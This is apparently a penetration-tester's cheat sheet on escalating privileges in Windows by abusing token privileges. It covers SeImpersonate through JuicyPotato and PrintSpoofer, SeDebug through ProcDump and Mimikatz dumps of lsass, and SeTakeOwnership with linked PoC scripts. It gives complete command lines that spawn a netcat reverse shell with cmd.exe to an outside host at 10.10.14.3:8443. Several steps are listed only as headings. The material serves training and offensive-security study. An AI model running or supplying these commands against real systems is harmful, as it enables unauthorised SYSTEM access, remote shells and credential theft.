Windows User Privileges

SeImpersonate Privilege

Attackers often abuse this privilege in the "Potato style" privescs - where a service account can SeImpersonate, but not obtain full SYSTEM level privileges.

JuicyPatato Method

https://github.com/ohpe/juicy-potato

c:\tools\JuicyPotato.exe -l 53375 -p c:\windows\system32\cmd.exe -a "/c c:\tools\nc.exe 10.10.14.3 8443 -e cmd.exe" -t *

PrintSpoofer Method

JuicyPotato doesn't work on Windows Server 2019 and Windows 10 build 1809 onwards. However, PrintSpoofer and RoguePotato can be used to leverage the same privileges and gain NT AUTHORITY\SYSTEM level access. https://github.com/itm4n/PrintSpoofer

c:\tools\PrintSpoofer.exe -c "c:\tools\nc.exe 10.10.14.3 8443 -e cmd"

SeDebugPrivilege

To run a particular application or service or assist with troubleshooting, a user might be assigned the SeDebugPrivilege instead of adding the account into the administrators group.

We can use ProcDump from the SysInternals suite to leverage this privilege and dump process memory.

Dump Lsass

1 Dump lsass Process

2 Mimikatz Dump lsass Dump

RCE

https://raw.githubusercontent.com/decoder-it/psgetsystem/master/psgetsys.ps1

1 List Processes

2 Use PoC Script

SeTakeOwnershipPrivilege

SeTakeOwnershipPrivilege grants a user the ability to take ownership of any "securable object," meaning Active Directory objects, NTFS files/folders, printers, registry keys, services, and processes.

https://raw.githubusercontent.com/fashionproof/EnableAllTokenPrivs/master/EnableAllTokenPrivs.ps1

1 Enable Privilege

2 Check OwnerShip File

3 Taking Ownership File

4 Confirming Ownership

5 Modify ACL on File

Interesting Files to Read

PreviousOS AttacksNextWindows Group Privileges

Last updated